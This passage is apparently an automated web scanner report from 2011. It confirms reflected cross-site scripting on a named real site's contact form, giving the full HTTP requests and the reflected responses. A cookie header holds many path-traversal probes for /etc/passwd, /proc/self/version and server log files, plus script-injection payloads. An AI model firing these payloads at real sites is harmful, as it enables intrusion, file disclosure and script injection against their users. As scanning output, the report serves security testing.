<option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." 
>Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" 
src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('ContactUs',0,'')" alt="Contact Us" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerContactusActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script>
var RecaptchaOptions = {
theme :'custom',
lang :'en',
custom_theme_widget :'recaptcha_widget'
};
</script><div style="background:#eeeeee;"> <table width="902" border="0" align="center" cellpadding="0" cellspacing="0" style="background:url(images/ContectBgImg.png) repeat-y top;"> <tr> <td width="596"> <form method="post" action="contactUs.html"> <input type="hidden" id="value" name="value" value="3" /> <input type="hidden" id="subCategoryId" name="subCategoryId" value="-1" /> <table width="568" border="0" align="right" cellpadding="0" cellspacing="0">
<tr> <td height="84" colspan="2" style="font:bold 24px Arial, Helvetica, sans-serif; color:#2564c7;">Contact Us</td> </tr> <tr> <td colspan="2" style="border-top:1px solid #eaeaea; border-bottom:1px solid #eaeaea;"> <table width="539" border="0" align="left" cellspacing="0" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121; margin:10px 0 15px 0;"> <tr> <td width="257" height="40" align="right">First Name&nbsp;&nbsp; <input type="text" value="Smith" name="firstName" id="firstName" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> <td width="278" align="right">Last Name&nbsp;&nbsp; <input type="text" value="Smith" name="lastName" id="lastName" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> </tr> <tr> <td height="40" align="right">Email&nbsp;&nbsp; <input type="text" value="netsparker@example.com" name="email" id="email" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> <td align="right">Phone&nbsp;&nbsp; <input type="text" value="3" name="phone" id="phone" style="width:160px; border:1px groove #c3c3c3;" class="formError" /> </td> </tr> <tr> <td height="40" align="right">Company&nbsp;&nbsp; <input type="text" value="3" name="company" id="company" style="width:160px; border:1px groove #c3c3c3;" class=""/> </td> <td align="right"> Your Interest&nbsp;&nbsp; <select value="3" name="yourInterest" id="yourInterest" style="width:160px; border:1px groove #c3c3c3;"> <option>Media Relations</option> <option>Buy Leads</option> <option>Customer Service</option> <option>Investor Relations</option> <option>Partner</option> </select> </td> </tr> <tr> <td align="right">Lead Category&nbsp;&nbsp; <select name="leadCategory" id="leadCategory" class='' style="width:160px;"> <option selected="selected" value="3"></option> </select> </td> <td height="40" align="right">Company URL&nbsp;&nbsp; <input type="text" value="'"--></style></script><script>netsparker(0x000CE8)</script>" name="url" id="url" style="width:160px; 
border:1px groove #c3c3c3;" class=""/> </td> </tr> </table> </td> </tr> <tr> <td width="95" height="115" align="right" valign="top" style="padding:25px 0 0 0; font:normal 12px Arial, Helvetica, sans-serif; padding-right:2px;">Comments&nbsp;&nbsp; </td> <td wid..
- /contactUs.html

/contactUs.html CONFIRMED

http://www.insideup.com/contactUs.html

Parameters

Parameter        Type   Value
button           POST   Submit
captchaString    POST   3
comments         POST   3
company          POST   3
email            POST   netsparker@example.com
firstName        POST   Smith
lastName         POST   Smith
leadCategory     POST   3
phone            POST   3
subCategoryId    POST   -1
url              POST   3
value            POST   '"--></style></script><script>alert(0x000D13)</script>
yourInterest     POST   3

Request

POST /contactUs.html HTTP/1.1
Referer: http://www.insideup.com/contactUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 265
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

button=Submit&captchaString=3&comments=3&company=3&email=netsparker%40example.com&firstName=Smith&lastName=Smith&leadCategory=3&phone=3&subCategoryId=-1&url=3&value='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000D13)%3c%2fscript%3e&yourInterest=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:36:10 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=8B8F3D1D74907B7AA8EA0BBFDE4172EE; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, contact, email"/> <meta name="description" content="Getting in touch with the InsideUp team"/> <meta name="robots" content="index; follow"/> <title>Contact us and send your feedback.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> 
<option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." 
>Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" 
src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('ContactUs',0,'')" alt="Contact Us" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerContactusActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script>
var RecaptchaOptions = {
theme :'custom',
lang :'en',
custom_theme_widget :'recaptcha_widget'
};
</script><div style="background:#eeeeee;"> <table width="902" border="0" align="center" cellpadding="0" cellspacing="0" style="background:url(images/ContectBgImg.png) repeat-y top;"> <tr> <td width="596"> <form method="post" action="contactUs.html"> <input type="hidden" id="value" name="value" value="'"--></style></script><script>netsparker(0x000D13)</script>" /> <input type="hidden" id="subCategoryId" name="subCategoryId" value="-1" /> <table width="568" border="0" align="right" cellpadding="0" cellspacing="0">
<tr> <td height="84" colspan="2" style="font:bold 24px Arial, Helvetica, sans-serif; color:#2564c7;">Contact Us</td> </tr> <tr> <td colspan="2" style="border-top:1px solid #eaeaea; border-bottom:1px solid #eaeaea;"> <table width="539" border="0" align="left" cellspacing="0" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121; margin:10px 0 15px 0;"> <tr> <td width="257" height="40" align="right">First Name&nbsp;&nbsp; <input type="text" value="Smith" name="firstName" id="firstName" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> <td width="278" align="right">Last Name&nbsp;&nbsp; <input type="text" value="Smith" name="lastName" id="lastName" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> </tr> <tr> <td height="40" align="right">Email&nbsp;&nbsp; <input type="text" value="netsparker@example.com" name="email" id="email" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> <td align="right">Phone&nbsp;&nbsp; <input type="text" value="3" name="phone" id="phone" style="width:160px; border:1px groove #c3c3c3;" class="formError" /> </td> </tr> <tr> <td height="40" align="right">Company&nbsp;&nbsp; <input type="text" value="3" name="company" id="company" style="width:160px; border:1px groove #c3c3c3;" class=""/> </td> <td align="right"> Your Interest&nbsp;&nbsp; <select value="3" name="yourInterest" id="yourInterest" style="width:160px; border:1px groove #c3c3c3;"> <option>Media Relations</option> <option>Buy Leads</option> <option>Customer Service</option> <option>Investor Relations</option> <option>Partner</option> </select> </td> </tr> <tr> <td align="right">Lead Category&nbsp;&nbsp; <select name="leadCategory" id="leadCategory" class='' style="width:160px;"> <option selected="selected" value="3"></option> </select> </td> <td height="40" align="right">Company URL&nbsp;&nbsp; <input type="text" value="3" name="url" id="url" style="width:160px; border:1px groove #c3c3c3;" class=""/> </td> </tr> </table> 
</td> </tr> <tr> <td width="95" height="115" align="right" valign="top" style="padding:25px 0 0 0; font:normal 12px Arial, Helvetica, sans-serif; padding-right:2px;">Comments&nbsp;&nbsp; </td> <td wid..
- /contactUs.html

/contactUs.html CONFIRMED

http://www.insideup.com/contactUs.html

Parameters

Parameter Type Value
button POST Submit
captchaString POST 3
comments POST 3
company POST 3
email POST netsparker@example.com
firstName POST Smith
lastName POST Smith
leadCategory POST 3
phone POST 3
subCategoryId POST -1
url POST 3
value POST 3
yourInterest POST '"--></style></script><script>alert(0x000D3E)</script>

Request

POST /contactUs.html HTTP/1.1
Referer: http://www.insideup.com/contactUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Content-Length: 265
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

button=Submit&captchaString=3&comments=3&company=3&email=netsparker%40example.com&firstName=Smith&lastName=Smith&leadCategory=3&phone=3&subCategoryId=-1&url=3&value=3&yourInterest='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000D3E)%3c%2fscript%3e

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:36:14 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=5A81E68A25E61ABC9599C96357CB4FC7; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, contact, email"/> <meta name="description" content="Getting in touch with the InsideUp team"/> <meta name="robots" content="index; follow"/> <title>Contact us and send your feedback.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option 